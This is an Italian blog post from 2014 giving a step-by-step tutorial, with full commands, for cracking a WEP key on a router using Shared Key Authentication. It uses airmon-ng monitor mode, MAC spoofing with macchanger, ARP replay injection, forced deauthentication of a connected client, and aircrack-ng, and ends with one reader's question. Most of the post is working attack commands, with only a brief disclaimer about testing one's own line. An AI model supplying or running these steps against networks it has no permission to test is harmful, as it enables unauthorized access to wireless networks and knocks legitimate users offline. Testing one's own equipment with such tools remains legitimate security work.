domenica 6 aprile 2014

Crack Broken Shared key authentication WEP con aircrack-ng

Attenzione: L’UTILIZZO DI UNA RETE ALTRUI SENZA CONSENSO È REATO,QUINDI TESTATE LA LINEA DI VOSTRA UTENZA ED INOLTRE NON MI PRENDO NESSUNA RESPONSABILITÀ PER LE VOSTRE AZIONI.


Ormai, crackare una rete wireless con chiave WEP, è davvero semplice. Trovate tantissime guide su google sul come fare.

Testando il mio router, pochi giorni fa, ho deciso di provare a crackare la chiave WEP  però ,stavolta, con autenticazione SKA( Shared Key Authentication ).
Con questo tipo di autenticazione, la fake authentication di aireplay, non ha effetto quindi non potrete autenticarvi per recuperare i vostri iVs che poi vi serviranno per il crack della password WEP.

Premetto subito che, senza client(s) connessi al router,NON è possibile recuperare la  WEP.

Gli strumenti che ci necessitano sono :
1) aircrack-ng , Scaricabile dalla pagina ufficiale ;
2) macchanger , un programma che permette di cambiare il Mac della vostra scheda di rete:
    $sudo apt-get install macchanger

3) una scheda di rete wireless compatibile per l'injection e quindi che possa andare in monitor mode.

Bene, adesso eseguite i seguenti comandi da super utente:

1. Mettete in monitor mode la vostra scheda wireless,assumendo che la vostra scheda di rete sia wlan0 e il  canale del vostro router sia 10:

    # airmon-ng start wlan0 10

( Per vedere quale sia il nome della vostra scheda di rete basta dare da terminale ifconfig -a )

2. Avviate airodump-ng per la visualizzazione del mac address di un client connesso ( ovvero un vostro dispositivo connesso al vostro router ) e appuntatelo.
Quindi assumendo che AA:AA:AA:AA:AA:AA sia il mac del vostro router e CC:CC:CC:CC:CC:CC sia il mac del vostro dispositivo connesso al vostro router:

# airodump-ng --bssid AA:AA:AA:AA:AA:AA -c 10 mon0

i dispositivi collegati, compariranno sotto a sinistra.
stoppate airodump.(Ctrl+C)

3. Avendo appuntato il Mac del dispositivo connesso ,dovete metterlo posto del vostro.
# ifconfig mon0 down
# macchanger -m CC:CC:CC:CC:CC:CC
# ifconfig mon0 up

4. Adesso aprite tre schede del terminale ,in una:
# airodump-ng --bssid AA:AA:AA:AA:AA:AA -c 10 -w BROKENSKA mon0

nella seconda:
# aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0

nella terza deautenticate il client per far funzionare l'attacco di prima
# aireplay-ng -0 3 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0

Nella prima scheda, vedrete i #Data  incrementare , saranno poi i pacchetti che vi serviranno per trovare la chiave.
Non ci sono un numero prestabilito di iVs per il crack di una chiave WEP .
Comunque per una 128 bit, 10 mila dovrebbero andare bene.

Avuto un numero sufficiente di iVs:

# aircrack-ng BROKENSKA.cap

Enjoy!

2 commenti:

  1. Ma deatuenticando il mio dispositivo i data si fermano. Invece se non lo faccio salgono vertiginosamente. Perche?

    RispondiElimina